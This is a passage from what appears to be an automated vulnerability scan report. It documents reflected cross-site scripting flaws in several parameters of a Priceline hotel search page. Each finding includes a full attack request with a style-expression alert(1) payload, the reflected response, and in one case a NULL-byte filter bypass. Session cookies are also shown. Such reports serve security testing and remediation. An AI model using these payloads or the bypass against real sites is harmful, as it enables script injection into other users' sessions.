Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the CkOutMonth request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f9d7"style%3d"x%3aexpression(alert(1))"7ebc51a19c27b1e81 was submitted in the CkOutMonth parameter. This input was echoed as 1f9d7"style="x:expression(alert(1))"7ebc51a19c27b1e81 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH&checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=101f9d7"style%3d"x%3aexpression(alert(1))"7ebc51a19c27b1e81&CkOutDay=07&CkOutYear=2011&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName=Boston%2CUnited+States&starRating=-1&numberOfRooms=1&searchHotelName=&hotelBrand= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:30 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5564010a5463010a20111003001430b72011715219; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A14%3A30&ID=IGOUGO&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:14:30 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 8955
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="CkOutMonth" value="101f9d7"style="x:expression(alert(1))"7ebc51a19c27b1e81"/>
...[SNIP]...

4.114. http://travela.priceline.com/hotel/searchHotels.do [CkOutYear parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the CkOutYear request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71755"style%3d"x%3aexpression(alert(1))"34164ddab186c8c9c was submitted in the CkOutYear parameter. This input was echoed as 71755"style="x:expression(alert(1))"34164ddab186c8c9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH&checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07&CkOutYear=201171755"style%3d"x%3aexpression(alert(1))"34164ddab186c8c9c&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName=Boston%2CUnited+States&starRating=-1&numberOfRooms=1&searchHotelName=&hotelBrand= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:56 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=4663010a5564010a2011100300145654c011739233; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A14%3A56&ID=IGOUGO&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:14:56 GMT; Path=/
Set-Cookie: JSESSIONID=8713C6827FBDD28A5D10D6451CD4ECEB; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8919
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="CkOutYear" value="201171755"style="x:expression(alert(1))"34164ddab186c8c9c"/>
...[SNIP]...

4.115. http://travela.priceline.com/hotel/searchHotels.do [Initialized parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the Initialized request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f700"style%3d"x%3aexpression(alert(1))"a1fe5a6ded2a0bc4c was submitted in the Initialized parameter. This input was echoed as 1f700"style="x:expression(alert(1))"a1fe5a6ded2a0bc4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH&checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07&CkOutYear=2011&homepage=Y&Initialized=Y1f700"style%3d"x%3aexpression(alert(1))"a1fe5a6ded2a0bc4c&cityName=Boston%2CUnited+States&otherCityName=Boston%2CUnited+States&starRating=-1&numberOfRooms=1&searchHotelName=&hotelBrand= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:15:54 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5064010a5564010a20111003001554a76011741318; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A15%3A54&ID=IGOUGO&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:15:54 GMT; Path=/
Set-Cookie: JSESSIONID=EEBB065C45978A81D0AA825A7A755F5C; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8925
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="Initialized" value="Y1f700"style="x:expression(alert(1))"a1fe5a6ded2a0bc4c"/>
...[SNIP]...

4.116. http://travela.priceline.com/hotel/searchHotels.do [KMode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the KMode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f375a"style%3d"x%3aexpression(alert(1))"1083b24de5b was submitted in the KMode parameter. This input was echoed as f375a"style="x:expression(alert(1))"1083b24de5b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC2011100300374475eeb1270807&plf=pclh&INIT_SESSION=true&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH&searchType=CITY&cityName=bos&numberOfRooms=1&hotelBrand=&searchHotelName=&starRating=-1&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&KMode=Yf375a"style%3d"x%3aexpression(alert(1))"1083b24de5b&selectedTab=0&passingValues=YES&affiliateSubID=514A HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/qp.asp?productid=5&city=bos&rooms=1&checkindate=10/09/2011&checkoutdate=10/16/2011&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Referral=CLICKID=TRIP%5FHOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A37%3A31&ID=AWAYNETWORK; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=711510AC721510AC2011100300374475eeb1270807

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:44:33 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5463010a4663010a20111003004433053011593807; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A44%3A33&ID=AWAYNETWORK&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:44:33 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 8673
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="KMode" value="Yf375a"style="x:expression(alert(1))"1083b24de5b"/>
...[SNIP]...

4.117. http://travela.priceline.com/hotel/searchHotels.do [RefClickID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the RefClickID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d666c"style%3d"x%3aexpression(alert(1))"6029e375022ac7278 was submitted in the RefClickID parameter. This input was echoed as d666c"style="x:expression(alert(1))"6029e375022ac7278 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCHd666c"style%3d"x%3aexpression(alert(1))"6029e375022ac7278&checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07&CkOutYear=2011&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName=Boston%2CUnited+States&starRating=-1&numberOfRooms=1&searchHotelName=&hotelBrand= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:12:53 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5564010a4663010a20111003001253981011595279; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCHd666c%22style%3D%22x%3Aexpression%28alert%281%29%29%226029e375022ac7278&WEBENTRYTIME=10%2F02%2F2011+20%3A12%3A53&ID=IGOUGO&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:12:53 GMT; Path=/
Set-Cookie: JSESSIONID=4263A88E7E9EDD0CE311D6D440D7189A; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8925
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="RefClickID" value="HOTELSEARCHd666c"style="x:expression(alert(1))"6029e375022ac7278"/>
...[SNIP]...

4.118. http://travela.priceline.com/hotel/searchHotels.do [RefID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the RefID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5802f"style%3d"x%3aexpression(alert(1))"1cc0c45dbb9a463a3 was submitted in the RefID parameter. This input was echoed as 5802f"style="x:expression(alert(1))"1cc0c45dbb9a463a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO5802f"style%3d"x%3aexpression(alert(1))"1cc0c45dbb9a463a3&RefClickID=HOTELSEARCH&checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07&CkOutYear=2011&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName=Boston%2CUnited+States&starRating=-1&numberOfRooms=1&searchHotelName=&hotelBrand= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:12:41 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5463010a5564010a20111003001241974011594863; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A12%3A41&ID=IGOUGO5802f%22style%3D%22x%3Aexpression%28alert%281%29%29%221cc0c45dbb9a463a3&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:12:41 GMT; Path=/
Set-Cookie: JSESSIONID=E7D0ED24577F3A9566271CAF9EB4BDB6; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8944
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="RefID" value="PLIGOUGO5802f"style="x:expression(alert(1))"1cc0c45dbb9a463a3"/>
...[SNIP]...

4.119. http://travela.priceline.com/hotel/searchHotels.do [affiliateSubID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the affiliateSubID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c5b2"style%3d"x%3aexpression(alert(1))"5ad1231780b was submitted in the affiliateSubID parameter. This input was echoed as 5c5b2"style="x:expression(alert(1))"5ad1231780b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC2011100300374475eeb1270807&plf=pclh&INIT_SESSION=true&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH&searchType=CITY&cityName=bos&numberOfRooms=1&hotelBrand=&searchHotelName=&starRating=-1&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&KMode=Y&selectedTab=0&passingValues=YES&affiliateSubID=514A5c5b2"style%3d"x%3aexpression(alert(1))"5ad1231780b HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/qp.asp?productid=5&city=bos&rooms=1&checkindate=10/09/2011&checkoutdate=10/16/2011&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Referral=CLICKID=TRIP%5FHOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A37%3A31&ID=AWAYNETWORK; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=711510AC721510AC2011100300374475eeb1270807

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:45:07 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5463010a5064010a201110030045078f1011587742; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A45%3A07&ID=AWAYNETWORK&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:45:07 GMT; Path=/
Set-Cookie: JSESSIONID=3B7735426801E4E75FB6596A4FA0E81B; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8667
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="affiliateSubID" value="514A5c5b2"style="x:expression(alert(1))"5ad1231780b"/>
...[SNIP]...

4.120. http://travela.priceline.com/hotel/searchHotels.do [checkInDate parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the checkInDate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5872"style%3d"x%3aexpression(alert(1))"291cab46a60d439a6 was submitted in the checkInDate parameter. This input was echoed as b5872"style="x:expression(alert(1))"291cab46a60d439a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

